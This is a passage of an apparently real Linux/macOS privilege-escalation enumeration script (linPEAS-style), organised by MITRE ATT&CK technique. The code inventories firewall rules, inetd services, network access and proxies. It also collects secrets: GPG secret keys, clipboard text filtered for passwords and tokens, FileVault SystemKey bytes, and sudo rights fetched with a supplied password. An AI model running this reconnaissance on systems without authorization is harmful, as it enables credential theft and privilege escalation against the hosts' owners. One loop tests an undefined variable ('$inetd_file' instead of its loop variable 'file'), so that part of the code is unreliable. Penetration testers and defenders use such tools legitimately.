   8875         if [ -f "$rules_file" ]; then
   8876             echo "Found rules in $rules_file:"
   8877             warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
   8878         fi
   8879     done
   8880 }
   8881 # Function to analyze nftables rules
   8882 analyze_nftables() {
   8883     echo ""
   8884     print_3title "Nftables Rules" "T1016"
   8885     # Check if nft is available
   8886     if ! check_command nft; then
   8887         echo_not_found "nftables"
   8888         return
   8889     fi
   8890     # Check if we have permission to list rules
   8891     if ! timeout 1 nft list ruleset >/dev/null 2>&1; then
   8892         echo "No permission to list nftables rules" | sed -${E} "s,.*,${SED_RED},g"
   8893         return
   8894     fi
   8895     # Get nftables version
   8896     warn_exec nft --version 2>/dev/null
   8897     # List all rules
   8898     echo -e "\nNftables Ruleset:"
   8899     warn_exec nft list ruleset 2>/dev/null
   8900     echo -e "\nNftables Ruleset with handles (-a):"
   8901     warn_exec nft -a list ruleset 2>/dev/null | sed -${E} "s,\\bdrop\\b|\\breject\\b|handle [0-9]+,${SED_RED_YELLOW},g"
   8902     # Check for saved rules
   8903     echo -e "\nSaved Rules:"
   8904     for rules_file in /etc/nftables.conf /etc/sysconfig/nftables.conf; do
   8905         if [ -f "$rules_file" ]; then
   8906             echo "Found rules in $rules_file:"
   8907             warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
   8908         fi
   8909     done
   8910 }
   8911 # Function to analyze firewalld rules
   8912 analyze_firewalld() {
   8913     echo ""
   8914     print_3title "Firewalld Rules" "T1016"
   8915     # Check if firewall-cmd is available
   8916     if ! check_command firewall-cmd; then
   8917         echo_not_found "firewalld"
   8918         return
   8919     fi
   8920     # Check if firewalld is running
   8921     if ! systemctl is-active firewalld >/dev/null 2>&1; then
   8922         echo "Firewalld is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
   8923         return
   8924     fi
   8925     # Get firewalld version
   8926     warn_exec firewall-cmd --version 2>/dev/null
   8927     # List all zones
   8928     echo -e "\nFirewalld Zones:"
   8929     warn_exec firewall-cmd --list-all-zones 2>/dev/null
   8930     # List active zones
   8931     echo -e "\nActive Zones:"
   8932     warn_exec firewall-cmd --get-active-zones 2>/dev/null
   8933     # List services
   8934     echo -e "\nAvailable Services:"
   8935     warn_exec firewall-cmd --list-services 2>/dev/null
   8936     # List ports
   8937     echo -e "\nOpen Ports:"
   8938     warn_exec firewall-cmd --list-ports 2>/dev/null
   8939     # List rich rules
   8940     echo -e "\nRich Rules:"
   8941     warn_exec firewall-cmd --list-rich-rules 2>/dev/null
   8942 }
   8943 # Function to analyze UFW rules
   8944 analyze_ufw() {
   8945     echo ""
   8946     print_3title "UFW Rules" "T1016"
   8947     # Check if ufw is available
   8948     if ! check_command ufw; then
   8949         echo_not_found "ufw"
   8950         return
   8951     fi
   8952     # Check if UFW is running
   8953     if ! ufw status >/dev/null 2>&1; then
   8954         echo "UFW is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
   8955         return
   8956     fi
   8957     # Get UFW version
   8958     warn_exec ufw version 2>/dev/null
   8959     # List rules
   8960     echo -e "\nUFW Rules:"
   8961     warn_exec ufw status verbose 2>/dev/null
   8962     # List numbered rules
   8963     echo -e "\nNumbered Rules:"
   8964     warn_exec ufw status numbered 2>/dev/null
   8965 }
   8966 # Main function to analyze firewall rules
   8967 analyze_firewall_rules() {
   8968     print_2title "Firewall Rules Analysis" "T1016"
   8969     # Analyze different firewall systems
   8970     analyze_iptables
   8971     analyze_nftables
   8972     analyze_firewalld
   8973     analyze_ufw
   8974     echo ""
   8975     print_3title "Forwarding and rp_filter" "T1016"
   8976     for sysctl_var in net.ipv4.ip_forward net.ipv6.conf.all.forwarding net.ipv4.conf.all.rp_filter; do
   8977         sysctl "$sysctl_var" 2>/dev/null | sed -${E} "s,=[[:space:]]*1,${SED_RED_YELLOW},g"
   8978     done
   8979     if check_command conntrack; then
   8980         echo -e "\nConntrack state (first 20):"
   8981         warn_exec conntrack -L 2>/dev/null | head -n 20
   8982     fi
   8983     # Additional checks if EXTRA_CHECKS is enabled
   8984     if [ "$EXTRA_CHECKS" ]; then
   8985         echo ""
   8986         print_3title "Additional Firewall Information" "T1016"
   8987         # Check for common firewall configuration files
   8988         echo "Checking for firewall configuration files..."
   8989         for config_file in /etc/sysconfig/iptables /etc/sysconfig/ip6tables /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/nftables.conf /etc/ufw/user.rules /etc/ufw/user6.rules; do
   8990             if [ -f "$config_file" ]; then
   8991                 echo "Found configuration file: $config_file" | sed -${E} "s,.*,${SED_GREEN},g"
   8992             fi
   8993         done
   8994         # Check for firewall management tools
   8995         echo -e "\nChecking for firewall management tools..."
   8996         for tool in shorewall shorewall6 ferm; do
   8997             if check_command "$tool"; then
   8998                 echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8999             fi
   9000         done
   9001     fi
   9002     echo ""
   9003 }
   9004 # Run the main function
   9005 analyze_firewall_rules
   9006 
   9007 fi
   9008 
   9009 if check_mitre_filter "T1049"; then
   9010 # Function to check if a command exists and is executable
   9011 check_command() {
   9012     local cmd=$1
   9013     if command -v "$cmd" >/dev/null 2>&1; then
   9014         if [ -x "$(command -v "$cmd")" ]; then
   9015             return 0
   9016         fi
   9017     fi
   9018     return 1
   9019 }
   9020 # Function to analyze inetd services
   9021 analyze_inetd() {
   9022     echo ""
   9023     print_3title "Inetd Services" "T1049"
   9024     # Check if inetd is installed
   9025     if ! check_command inetd; then
   9026         echo_not_found "inetd"
   9027         return
   9028     fi
   9029     # Check if inetd is running
   9030     if ! pgrep -x inetd >/dev/null 2>&1; then
   9031         echo "inetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
   9032     fi
   9033     # Get inetd version
   9034     warn_exec inetd -v 2>/dev/null
   9035     # Check main configuration file
   9036     if [ -f "/etc/inetd.conf" ]; then
   9037         echo -e "\nInetd Configuration (/etc/inetd.conf):"
   9038         warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
   9039         # Check for potentially dangerous services
   9040         echo -e "\nPotentially Dangerous Services:"
   9041         warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" | grep -iE "shell|login|exec|rsh|rlogin|rexec|finger|telnet|ftp|tftp" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
   9042     else
   9043         echo_not_found "/etc/inetd.conf"
   9044     fi
   9045     # Check for additional configuration files
   9046     echo -e "\nAdditional Inetd Configuration Files:"
   9047     for conf_file in /etc/inetd.d/* /etc/inet/*.conf; do
   9048         if [ -f "$conf_file" ]; then
   9049             echo "Found configuration in $conf_file:"
   9050             warn_exec cat "$conf_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
   9051         fi
   9052     done
   9053 }
   9054 # Function to analyze xinetd services
   9055 analyze_xinetd() {
   9056     echo ""
   9057     print_3title "Xinetd Services" "T1049"
   9058     # Check if xinetd is installed
   9059     if ! check_command xinetd; then
   9060         echo_not_found "xinetd"
   9061         return
   9062     fi
   9063     # Check if xinetd is running
   9064     if ! pgrep -x xinetd >/dev/null 2>&1; then
   9065         echo "xinetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
   9066     fi
   9067     # Get xinetd version
   9068     warn_exec xinetd -version 2>/dev/null
   9069     # Check main configuration file
   9070     if [ -f "/etc/xinetd.conf" ]; then
   9071         echo -e "\nXinetd Configuration (/etc/xinetd.conf):"
   9072         warn_exec cat /etc/xinetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
   9073         # Check for included configurations
   9074         echo -e "\nIncluded Configurations:"
   9075         warn_exec grep -r "includedir" /etc/xinetd.conf 2>/dev/null
   9076     else
   9077         echo_not_found "/etc/xinetd.conf"
   9078     fi
   9079     # Check for service-specific configurations
   9080     echo -e "\nService Configurations:"
   9081     for service_dir in /etc/xinetd.d/ /etc/xinetd/; do
   9082         if [ -d "$service_dir" ]; then
   9083             echo "Services in $service_dir:"
   9084             for service_file in "$service_dir"/*; do
   9085                 if [ -f "$service_file" ]; then
   9086                     service_name=$(basename "$service_file")
   9087                     echo -e "\nService: $service_name"
   9088                     # Check if service is enabled
   9089                     if grep -q "disable.*=.*no" "$service_file" 2>/dev/null; then
   9090                         echo "Status: Enabled" | sed -${E} "s,.*,${SED_RED},g"
   9091                     else
   9092                         echo "Status: Disabled"
   9093                     fi
   9094                     # Show service configuration
   9095                     warn_exec cat "$service_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
   9096                     # Check for potentially dangerous configurations
   9097                     if grep -qiE "server.*=.*/bin/|server.*=.*/sbin/|server.*=.*/usr/bin/|server.*=.*/usr/sbin/" "$service_file" 2>/dev/null; then
   9098                         echo "Warning: Service uses system binaries" | sed -${E} "s,.*,${SED_RED},g"
   9099                     fi
   9100                     if grep -qiE "user.*=.*root|user.*=.*0" "$service_file" 2>/dev/null; then
   9101                         echo "Warning: Service runs as root" | sed -${E} "s,.*,${SED_RED},g"
   9102                     fi
   9103                 fi
   9104             done
   9105         fi
   9106     done
   9107 }
   9108 # Function to check for running inetd/xinetd services
   9109 check_running_services() {
   9110     echo ""
   9111     print_3title "Running Inetd/Xinetd Services" "T1049"
   9112     # Check netstat for services
   9113     if check_command netstat; then
   9114         echo "Active Services (from netstat):"
   9115         warn_exec netstat -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
   9116     fi
   9117     # Check ss for services
   9118     if check_command ss; then
   9119         echo -e "\nActive Services (from ss):"
   9120         warn_exec ss -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
   9121     fi
   9122     # Check for service processes
   9123     echo -e "\nRunning Service Processes:"
   9124     for inetd_service in $(pgrep -l inetd 2>/dev/null; pgrep -l xinetd 2>/dev/null); do
   9125         echo "$inetd_service" | sed -${E} "s,.*,${SED_RED},g"
   9126     done
   9127 }
   9128 # Main function to analyze inetd/xinetd services
   9129 analyze_inetd_services() {
   9130     print_2title "Inetd/Xinetd Services Analysis" "T1049"
   9131     # Analyze inetd and xinetd services
   9132     analyze_inetd
   9133     analyze_xinetd
   9134     # Check for running services
   9135     check_running_services
   9136     # Additional checks if EXTRA_CHECKS is enabled
   9137     if [ "$EXTRA_CHECKS" ]; then
   9138         echo ""
   9139         print_3title "Additional Inetd/Xinetd Information" "T1049"
   9140         # Check for inetd/xinetd logs
   9141         echo "Checking for service logs..."
   9142         for log_file in /var/log/inetd.log /var/log/xinetd.log /var/log/messages /var/log/syslog; do
   9143             if [ -f "$log_file" ]; then
   9144                 echo "Found log file: $log_file" | sed -${E} "s,.*,${SED_GREEN},g"
   9145                 warn_exec tail -n 20 "$log_file" | grep -iE "inetd|xinetd" 2>/dev/null
   9146             fi
   9147         done
   9148         # Check for inetd/xinetd related files
   9149         echo -e "\nChecking for related files..."
   9150         for file in /etc/init.d/inetd /etc/init.d/xinetd /etc/default/inetd /etc/default/xinetd; do
   9151             if [ -f "$inetd_file" ]; then
   9152                 echo "Found file: $inetd_file" | sed -${E} "s,.*,${SED_GREEN},g"
   9153                 warn_exec cat "$inetd_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
   9154             fi
   9155         done
   9156     fi
   9157     echo ""
   9158 }
   9159 # Run the main function
   9160 analyze_inetd_services
   9161 
   9162 fi
   9163 
   9164 if check_mitre_filter "T1016"; then
   9165 if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
   9166   print_2title "Hardware Ports" "T1016"
   9167   networksetup -listallhardwareports
   9168   echo ""
   9169   print_2title "VLANs" "T1016"
   9170   networksetup -listVLANs
   9171   echo ""
   9172   print_2title "Wifi Info" "T1016"
   9173   networksetup -getinfo Wi-Fi
   9174   echo ""
   9175   print_2title "Check Enabled Proxies" "T1016"
   9176   scutil --proxy
   9177   echo ""
   9178   print_2title "Wifi Proxy URL" "T1016"
   9179   networksetup -getautoproxyurl Wi-Fi
   9180   echo ""
   9181   print_2title "Wifi Web Proxy" "T1016"
   9182   networksetup -getwebproxy Wi-Fi
   9183   echo ""
   9184 fi
   9185 
   9186 fi
   9187 
   9188 if check_mitre_filter "T1016,T1590"; then
   9189 print_2title "Internet Access?" "T1016,T1590"
   9190 TIMEOUT_INTERNET_SECONDS=5
   9191 if [ "$SUPERFAST" ]; then
   9192   TIMEOUT_INTERNET_SECONDS=2.5
   9193 fi
   9194 # Run all checks in background
   9195 check_tcp_80 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid1=$!
   9196 check_tcp_443 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid2=$!
   9197 check_icmp "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid3=$!
   9198 check_dns "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid4=$!
   9199 # Kill all check workers after timeout + 1s without relying on integer arithmetic
   9200 (sleep "$TIMEOUT_INTERNET_SECONDS"; sleep 1; kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) &
   9201 check_tcp_443_bin $TIMEOUT_INTERNET_SECONDS 2>/dev/null
   9202 tcp443_bin_status=$?
   9203 wait $pid1 $pid2 $pid3 $pid4 2>/dev/null
   9204 # Wait for all to finish
   9205 wait 2>/dev/null
   9206 if [ "$tcp443_bin_status" -eq 0 ] && \
   9207    [ -z "$SUPERFAST" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then
   9208   echo ""
   9209   print_2title "Is hostname malicious or leaked?" "T1016,T1590"
   9210   print_info "This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host."
   9211   check_external_hostname 2>/dev/null
   9212 fi
   9213 echo ""
   9214 print_3title "Proxy discovery" "T1016,T1590"
   9215 print_info "Checking common proxy env vars and apt proxy config"
   9216 (env | grep -iE '^(http|https|ftp|all)_proxy=|^no_proxy=') 2>/dev/null | sed -${E} "s,_proxy|no_proxy,${SED_RED_YELLOW},g"
   9217 grep -RinE 'Acquire::(http|https)::Proxy|proxy' /etc/apt/apt.conf /etc/apt/apt.conf.d 2>/dev/null | sed -${E} "s,proxy|Acquire::http::Proxy|Acquire::https::Proxy,${SED_RED_YELLOW},g"
   9218 echo ""
   9219 
   9220 fi
   9221 
   9222 fi
   9223 
   9224 fi
   9225 echo ''
   9226 echo ''
   9227 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
   9228 
   9229 if echo $CHECKS | grep -q users_information; then
   9230 if check_mitre_filter "T1548.003,T1548.004,T1068,T1087.001,T1069.001,T1033,T1201,T1110.001,T1543.001,T1555.001,T1552.004,T1115"; then
   9231 print_title "Users Information"
   9232 if check_mitre_filter "T1033,T1543.001"; then
   9233 if [ "$MACPEAS" ];then
   9234   print_2title "Current user Login and Logout hooks" "T1033,T1543.001"
   9235   defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
   9236   echo ""
   9237 fi
   9238 
   9239 fi
   9240 
   9241 if check_mitre_filter "T1033"; then
   9242 print_2title "My user" "T1033"
   9243 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users"
   9244 (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
   9245 echo ""
   9246 
   9247 fi
   9248 
   9249 if check_mitre_filter "T1543.001"; then
   9250 if [ "$MACPEAS" ];then
   9251   print_2title "All Login and Logout hooks" "T1543.001"
   9252   for user_home in /Users/*/ /private/var/root/; do
   9253     if [ -f "${user_home}Library/Preferences/com.apple.loginwindow.plist" ]; then
   9254       echo "User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9255       defaults read "${user_home}Library/Preferences/com.apple.loginwindow.plist" 2>/dev/null | grep -e "Hook" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9256     fi
   9257   done
   9258   echo ""
   9259 fi
   9260 
   9261 fi
   9262 
   9263 if check_mitre_filter "T1555.001"; then
   9264 if [ "$MACPEAS" ];then
   9265   print_2title "Keychains" "T1555.001"
   9266   print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker"
   9267   echo "System Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9268   security list-keychains 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
   9269   echo -e "\nUser Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9270   for user_home in /Users/*/; do
   9271     if [ -d "${user_home}Library/Keychains" ]; then
   9272       echo "- User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9273       ls -la "${user_home}Library/Keychains/" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
   9274     fi
   9275   done
   9276   echo ""
   9277 fi
   9278 
   9279 fi
   9280 
   9281 if check_mitre_filter "T1555.001"; then
   9282 if [ "$MACPEAS" ];then
   9283   print_2title "SystemKey" "T1555.001"
   9284   echo "The SystemKey is used by FileVault to encrypt/decrypt the volume. If you can read it, you might be able to decrypt the disk."
   9285   echo -e "\nSystemKey file permissions:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9286   ls -l /var/db/SystemKey 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9287   if [ -r "/var/db/SystemKey" ]; then
   9288     echo -e "\nWARNING: You can read /var/db/SystemKey!" | sed -${E} "s,.*,${SED_RED},g"
   9289     echo "SystemKey content (first 24 bytes after header):" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9290     hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9291   fi
   9292   echo ""
   9293 fi
   9294 
   9295 fi
   9296 
   9297 if check_mitre_filter "T1552.004"; then
   9298 print_2title "PGP Keys and Related Files" "T1552.004"
   9299 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys"
   9300 # Check for GPG
   9301 echo "GPG:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9302 if command -v gpg >/dev/null 2>&1; then
   9303   echo "GPG is installed, listing keys:"
   9304   gpg --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
   9305   # Check for private keys
   9306   gpg --list-secret-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9307 else
   9308   echo_not_found "gpg"
   9309 fi
   9310 # Check for NetPGP
   9311 echo -e "\nNetPGP:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9312 if command -v netpgpkeys >/dev/null 2>&1; then
   9313   echo "NetPGP is installed" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9314   netpgpkeys --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
   9315 else
   9316   echo_not_found "netpgpkeys"
   9317 fi
   9318 # Check for common PGP files
   9319 echo -e "\nPGP Related Files:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9320 for pgp_file in "$HOME/.gnupg" "$HOME/.pgp" "$HOME/.openpgp" "$HOME/.ssh/gpg-agent.conf" "$HOME/.config/gpg"; do
   9321   if [ -e "$pgp_file" ]; then
   9322     echo "Found: $pgp_file"
   9323     if [ -d "$pgp_file" ]; then
   9324       ls -la "$pgp_file" 2>/dev/null
   9325     fi
   9326   fi
   9327 done
   9328 echo ""
   9329 
   9330 fi
   9331 
   9332 if check_mitre_filter "T1115"; then
   9333 if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
   9334   print_2title "Clipboard and Highlighted Text" "T1115"
   9335   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#clipboard"
   9336   # Function to check clipboard content
   9337   check_clipboard() {
   9338     local content="$1"
   9339     if [ -n "$content" ]; then
   9340       echo "$content" | sed -${E} "s,$pwd_inside_history,${SED_RED},g" | sed -${E} "s,(password|passwd|pwd).*=.*,${SED_RED},g" | sed -${E} "s,(token|key|secret).*=.*,${SED_RED},g"
   9341     fi
   9342   }
   9343   # Check different clipboard tools
   9344   if [ "$(command -v xclip 2>/dev/null || echo -n '')" ]; then
   9345     echo "Using xclip:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9346     echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9347     check_clipboard "$(xclip -o -selection clipboard 2>/dev/null)"
   9348     echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9349     check_clipboard "$(xclip -o 2>/dev/null)"
   9350   elif [ "$(command -v xsel 2>/dev/null || echo -n '')" ]; then
   9351     echo "Using xsel:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9352     echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9353     check_clipboard "$(xsel -ob 2>/dev/null)"
   9354     echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9355     check_clipboard "$(xsel -o 2>/dev/null)"
   9356   elif [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ]; then
   9357     echo "Using pbpaste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9358     echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9359     check_clipboard "$(pbpaste 2>/dev/null)"
   9360   elif [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ]; then
   9361     echo "Using wl-paste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9362     echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9363     check_clipboard "$(wl-paste 2>/dev/null)"
   9364   else
   9365     echo_not_found "clipboard tools (xclip, xsel, pbpaste, wl-paste)"
   9366   fi
   9367   echo ""
   9368 fi
   9369 
   9370 fi
   9371 
   9372 if check_mitre_filter "T1548.003"; then
   9373 print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" "T1548.003"
   9374 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid"
   9375 sudo_l_colorize() {
   9376   sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g"
   9377 }
   9378 sudo_l_colorize_output() {
   9379   printf "%s\n" "$1" | sudo_l_colorize | sed "s,\!root,${SED_RED},"
   9380 }
   9381 sudo_l_colorize_file() {
   9382   grep -Iv "^$" "$1" | grep -v "#" | sudo_l_colorize | sed "s,pwfeedback,${SED_RED},g"
   9383 }
   9384 if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then
   9385   if [ "$TIMEOUT" ]; then
   9386     sudo_l_output=$(printf '\n' | "$TIMEOUT" 15 sudo -S -l 2>/dev/null)
   9387   else
   9388     sudo_l_output=$(sudo -n -l 2>/dev/null)
   9389   fi
   9390   sudo_l_colorize_output "$sudo_l_output"
   9391   if [ "$PASSWORD" ]; then
   9392     if [ "$TIMEOUT" ]; then
   9393       sudo_l_password_output=$(printf "%s\n" "$PASSWORD" | "$TIMEOUT" 15 sudo -S -l 2>/dev/null)
   9394     else
   9395       sudo_l_password_output=$(printf "%s\n" "$PASSWORD" | sudo -S -l 2>/dev/null)
   9396     fi
   9397     printf "%s\n" "$sudo_l_password_output" | sudo_l_colorize
   9398   fi
   9399   sudo_l_cached_output=$(sudo -n -l 2>/dev/null)
   9400   if [ "$sudo_l_cached_output" ]; then
   9401     sudo_l_colorize_output "$sudo_l_cached_output"
   9402   else
   9403     echo "No cached sudo token (sudo -n -l)"
   9404   fi
   9405 else
   9406   echo_not_found "sudo"
   9407 fi
   9408 secure_path_line=$(printf "%s\n%s\n%s\n" "$sudo_l_cached_output" "$sudo_l_password_output" "$sudo_l_output" | grep -o "secure_path=[^,]*" | head -n 1 | cut -d= -f2)
   9409 if [ "$secure_path_line" ]; then
   9410   for p in $(echo "$secure_path_line" | tr ':' ' '); do
   9411     if [ -w "$p" ]; then
   9412       echo "Writable secure_path entry: $p" | sed -${E} "s,.*,${SED_RED},g"
   9413     fi
   9414   done
   9415 fi
   9416 (sudo_l_colorize_file /etc/sudoers) 2>/dev/null || echo_not_found "/etc/sudoers"
   9417 if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
   9418   echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   9419 fi
   9420 for f in /etc/sudoers.d/*; do
   9421   if [ -w "$f" ]; then
   9422     echo "Sudoers file: $f is writable and may allow privilege escalation" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9423   fi
   9424   if [ -r "$f" ]; then
   9425     echo "Sudoers file: $f is readable" | sed -${E} "s,.*,${SED_RED},g"
   9426     sudo_l_colorize_file "$f"
   9427   fi
   9428 done
   9429 echo ""
   9430 
   9431 fi
   9432 
   9433 get_current_user_privot_pid
   9434 if check_mitre_filter "T1548.003"; then
   9435 print_2title "Checking sudo tokens" "T1548.003"
   9436 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens"
   9437 ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
   9438 if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
   9439   echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
   9440   if [ "$(command -v gdb 2>/dev/null || echo -n '')" ]; then
   9441     echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
   9442   fi
   9443   if [ "$CURRENT_USER_PIVOT_PID" ]; then
   9444     echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
   9445   fi
   9446   if [ -f "$HOME/.sudo_as_admin_successful" ]; then
   9447     echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
   9448   fi
   9449   if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
   9450     echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
   9451     ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
   9452   fi
   9453 else
   9454   echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
   9455 fi
   9456 if [ -d "/var/run/sudo/ts" ]; then
   9457   echo "Sudo token directory perms:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9458   ls -ld /var/run/sudo/ts 2>/dev/null
   9459   if [ -w "/var/run/sudo/ts" ]; then
   9460     echo "/var/run/sudo/ts is writable" | sed -${E} "s,.*,${SED_RED},g"
   9461   fi
   9462   if [ -f "/var/run/sudo/ts/$USER" ]; then
   9463     ls -l "/var/run/sudo/ts/$USER" 2>/dev/null
   9464     if [ -w "/var/run/sudo/ts/$USER" ]; then
   9465       echo "User sudo token file is writable" | sed -${E} "s,.*,${SED_RED},g"
   9466     fi
   9467   fi
   9468 fi
   9469 echo ""
   9470 
   9471 fi
   9472 
   9473 if check_mitre_filter "T1548.003"; then
   9474 doas_bin="$(command -v doas 2>/dev/null)"
   9475 doas_current_user="$(id -un 2>/dev/null)"
   9476 doas_current_uid="$(id -u 2>/dev/null)"
   9477 doas_current_groups="$(id -Gn 2>/dev/null)"
   9478 doas_current_gids="$(id -G 2>/dev/null)"
   9479 doas_bin_trusted="no"
   9480 doas_conf_candidates="/etc/doas.conf
   9481 /usr/local/etc/doas.conf
   9482 /opt/local/etc/doas.conf
   9483 /usr/pkg/etc/doas.conf"
   9484 if [ -n "$doas_bin" ]; then
   9485   doas_conf_candidates="$doas_conf_candidates
   9486 $(dirname "$doas_bin")/doas.conf
   9487 $(dirname "$doas_bin")/../etc/doas.conf
   9488 $(dirname "$doas_bin")/etc/doas.conf"
   9489   if command -v strings >/dev/null 2>&1; then
   9490     doas_strings_conf="$(strings "$doas_bin" 2>/dev/null | grep -E '^/[^[:space:]]*/doas\.conf$' | head -n 10)"
   9491     [ -n "$doas_strings_conf" ] && doas_conf_candidates="$doas_conf_candidates
   9492 $doas_strings_conf"
   9493   fi
   9494 fi
   9495 doas_conf_found="no"
   9496 for conf_file in /etc/doas.conf /usr/local/etc/doas.conf /opt/local/etc/doas.conf /usr/pkg/etc/doas.conf; do
   9497   [ -e "$conf_file" ] && doas_conf_found="yes"
   9498 done
   9499 if [ -n "$doas_bin" ] || [ "$doas_conf_found" = "yes" ]; then
   9500   print_2title "Doas/OpenDoas configuration and vulnerabilities" "T1548.003"
